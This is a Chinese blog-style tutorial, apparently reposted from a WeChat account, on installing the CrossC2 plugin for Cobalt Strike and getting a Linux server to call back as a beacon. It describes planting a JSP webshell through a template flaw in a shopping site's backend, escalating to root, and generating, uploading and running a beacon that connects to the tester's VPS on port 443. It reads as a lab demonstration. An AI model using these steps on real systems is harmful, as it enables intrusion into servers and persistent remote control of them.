众所周知cobalt-strike是一个偏windows系统的后渗透工具,针对linux系统如何上线,需要安装CrossC2插件,本周斗哥就教大家安装CrossC2插件,并利用该插件进行linux系统的CS上线。
1.工具清单
kali-linux-2022.1-vmware-amd64.7z
cobalt-strike4.3
CrossC2:https://github.com/gloxec/CrossC2
CrossC2Kit-GithubBot-2021-11-02.zip
CrossC2-GithubBot-2021-11-02.cna
genCrossC2.Linux
斗哥自助工具清单下载链接:https://pan.baidu.com/s/1AZE3WtB-6a0jGMMlZ2xCtQ
提取码:j794
2.安装过程
linux上安装CrossC2插件
打开kali,在kali的CS环境进行工具安装,
进入CS的根目录,将CrossC2插件安装需要的三个文件拷贝到CS根目录:
解压CrossC2Kit-GithubBot-2021-11-02.zip文件,解压后文件目录为CrossC2Kit
编辑CrossC2.cna文件,修改$CC2_PATH和$CC2_BIN地址为CC2文件所在目录:
$CC2_PATH = "/home/kali/Desktop/tools/cobaltstrike4.3/"; # <-------- fix
$CC2_BIN = "genCrossC2.Linux";
在kali上运行CS服务器端:
运行客户端,连接CS:
打开插件cobalt-strike-script manager进行插件添加,这里斗哥之前已经添加过了,添加后截图如下:
至此就完成linux端的cc2插件安装。
Windows上安装cc2插件和linux类似,小伙伴可自行尝试。
1.演示环境拓扑
kali-linuxVPS地址:66.28.6.22
生活商城官网:公网地址:http://66.28.5.2:8080,内网IP:10.10.19.10
2.linux上线过程
已知生活商城后台存在模板漏洞:
通过模板漏洞添加jsp一句话木马,使用蚁剑进行连接:
获取root权限如下:
在kali上运行CS服务器端:
运行客户端,连接CS:
在kali-vps上创建监听,注意选择Beacon HTTPS:
监听已经开启:
在genCrossC2.Linux所在目录 使用如下命令进行文件生成:
./genCrossC2.Linux 66.28.6.22 443 .cobaltstrike.beacon_keys null Linux x64 ./a.out
将生成的a.out文件上传到服务器:
给a.out添加运行权限,并运行a.out,然后就可以看到CS上上线的linux主机:
至此linux主机上线完成:
本周的分享就到这里啦!我是斗哥,下期见!
参考文章:
https://hack-for.fun/67f2.html
原文始发于微信公众号(国科漏斗社区):Cobalt-Strike之CrossC2插件安装与linux上线
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论